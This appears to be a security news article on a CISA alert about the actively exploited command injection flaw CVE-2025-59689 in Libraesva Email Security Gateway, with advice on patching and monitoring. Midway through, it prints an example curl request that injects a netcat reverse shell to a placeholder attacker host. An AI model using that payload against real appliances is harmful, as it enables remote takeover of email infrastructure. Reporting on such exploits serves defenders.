In late September 2025, the Cybersecurity and Infrastructure Security Agency (CISA) issued a public alert regarding the active exploitation of a critical command injection vulnerability tracked as CVE-2025-59689 in Libraesva Email Security Gateway (ESG) devices.
This flaw has rapidly emerged as a favored target for threat actors due to its ease of exploitation and the wide deployment of Libraesva ESG as a frontline defense in corporate and government email infrastructure.
The vulnerability allows unauthenticated attackers to execute arbitrary system commands on affected appliances, resulting in a significant risk of email compromise, data exfiltration, and lateral movement within networks.
Initial discovery of this security weakness surfaced after multiple security firms observed anomalous traffic directed at public-facing ESG appliances across Europe and North America.
Attackers quickly weaponized proof-of-concept exploits, taking advantage of the flaw’s simple payload delivery—typically through a crafted HTTP POST request to an exposed management interface.
Organizations relying on Libraesva ESG appliances for spam and phishing defense are directly at risk, with exploitation frequently resulting in full device takeover.
CISA analysts noted that attackers leveraging CVE-2025-59689 did so with high speed and stealth, leaving minimal traces in security logs.
Their investigations revealed that successful exploitation permitted payloads enabling remote shell access, installation of additional malware packages, and use of the ESG appliance as a pivot point for internal reconnaissance.
Notably, CISA documented several incidents where attackers deployed reverse shells to establish persistent access channels post-compromise.
The infection mechanism at the heart of CVE-2025-59689 is a classic OS command injection. An attacker submits a specially crafted request to the web-based management API with command payloads embedded in user-supplied parameters.
For example:-
curl – X POST “https://target-esg/management/api[.]php” – d ‘[cmd]=;nc – e /bin/bash attacker[.]com 4444′
This command illustrates how the flaw enables an external actor to spawn a remote shell directly to the attacker’s system, bypassing authentication controls.
CISA researchers found that many incidents occurred due to ESG appliances lacking recent security updates, underscoring the necessity for timely patching.
Libraesva ESG Exploit Flow begins with external payload delivery and culminating in command execution and attacker control.
The continued exploitation of CVE-2025-59689 reinforces the importance of robust patch management and vigilant monitoring of security infrastructure for signs of compromise.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
The post CISA Warns of Libraesva ESG Command Injection Vulnerability Actively Exploited in Attacks appeared first on Cyber Security News.
